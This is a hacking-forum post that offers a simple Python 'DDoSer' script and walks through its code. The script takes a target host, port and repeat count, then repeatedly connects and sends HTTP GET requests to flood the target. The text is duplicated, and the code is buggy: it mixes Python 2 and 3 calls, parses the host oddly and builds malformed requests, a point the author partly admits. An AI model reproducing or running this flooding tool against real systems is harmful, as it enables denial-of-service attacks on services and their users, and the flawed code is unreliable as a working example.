Yet Another DDoS Tool 03-06-2014, 12:42 AM
#1
I am in love with Python, especially using the socket import.
This is really simple, or at least to me, and easy to use.
I will explain the basics and then jump into the code and shit.
The tool requests your information such as how many packets to send, the time to relay them, the host, and it prompts the user if they have a specific port. If they don't have a specific port, then it defaults to port 80. Once all information has been filled out, it will attack them mother fuckers.
Examples:
![[Image: 2ilxxx.jpg]](http://oi59.tinypic.com/2ilxxx.jpg)
![[Image: oaut0w.jpg]](http://oi59.tinypic.com/oaut0w.jpg)
Keep in mind that the examples had the tool itself disabled as a safety precaution even though it wouldn't work anyways.
To the code!
We have four imports, pretty simple and easy enough, right?
Next we define launch, which is just basically the entire tool itself.
Let's break this down.
First the information such as our target and relay time is as follows.
That allows us to define our target and our relay time for how fast we send our shit.
Here we just have what splits our port and host from each other. It defaults to 80 if not specified.
Now we define ddos, where the magic happens.
Now we just have it do our relay time and have the program itself start off with launch.
(Working on instances, again)
Leave your comments, bullshit, flames, advice, and whatever else you may have below.
Update: This project will be HEAVILY edited, to see an edited version of this just go to my Github by clicking [here].
This is really simple, or at least to me, and easy to use.
I will explain the basics and then jump into the code and shit.
The tool requests your information such as how many packets to send, the time to relay them, the host, and it prompts the user if they have a specific port. If they don't have a specific port, then it defaults to port 80. Once all information has been filled out, it will attack them mother fuckers.
Examples:
Spoiler:
![[Image: 2ilxxx.jpg]](http://oi59.tinypic.com/2ilxxx.jpg)
![[Image: oaut0w.jpg]](http://oi59.tinypic.com/oaut0w.jpg)
Keep in mind that the examples had the tool itself disabled as a safety precaution even though it wouldn't work anyways.
To the code!
We have four imports, pretty simple and easy enough, right?
Code:
import os,sys,time,socketNext we define launch, which is just basically the entire tool itself.
Code:
def launch():
print("\n Attex DDoSer \n")
time = int(input("Relay, 1 - 1000000: "))
target = input("Target: ")
if ":" in target:
t,c = target.split(":",1)
c,t = c.split("'",1)
t2,c2 = target.split("'",1)
c2,t2 = c2.split(":",1)
else:
c = ''
t2,c2 = target.split("'",1)
c2,t2 = c2.split("'",1)
host = c2
if c == '':
port = 80
else:
port = int(c)
def ddos():
x = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
x.connect((host,port))
print("\nTARGET: {0}\nPORT: {1}\n".format(host,str(port)))
x.send("GET /"+host+"HTTP/1.1\r\n")
x.send("Host: "+host+"\r\n\r\n")
x.close()
for x in xrange(0,time):
ddos()Let's break this down.
First the information such as our target and relay time is as follows.
Code:
print("\n Attex DDoSer \n")
time = int(input("Relay, 1 - 1000000: "))
target = input("Target: ")That allows us to define our target and our relay time for how fast we send our shit.
Code:
if ":" in target:
t,c = target.split(":",1)
c,t = c.split("'",1)
t2,c2 = target.split("'",1)
c2,t2 = c2.split(":",1)
else:
c = ''
t2,c2 = target.split("'",1)
c2,t2 = c2.split("'",1)
host = c2
if c == '':
port = 80
else:
port = int(c)Here we just have what splits our port and host from each other. It defaults to 80 if not specified.
Now we define ddos, where the magic happens.
Code:
def ddos():
x = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
x.connect((host,port))
print("\nTARGET: {0}\nPORT: {1}\n".format(host,str(port)))
x.send("GET /"+host+"HTTP/1.1\r\n")
x.send("Host: "+host+"\r\n\r\n")
x.close()Now we just have it do our relay time and have the program itself start off with launch.
Code:
for x in xrange(0,time):
ddos()
launch()(Working on instances, again)
Leave your comments, bullshit, flames, advice, and whatever else you may have below.
Update: This project will be HEAVILY edited, to see an edited version of this just go to my Github by clicking [here].
![[Image: BXqGARG.png]](https://i.imgur.com/BXqGARG.png)










![[+]](https://sinister.li/images/modern/collapse_collapsed.png)


![[Image: inkexplosion.jpg]](http://i0.wp.com/techverse.net/wp-content/uploads/2013/09/inkexplosion.jpg)
















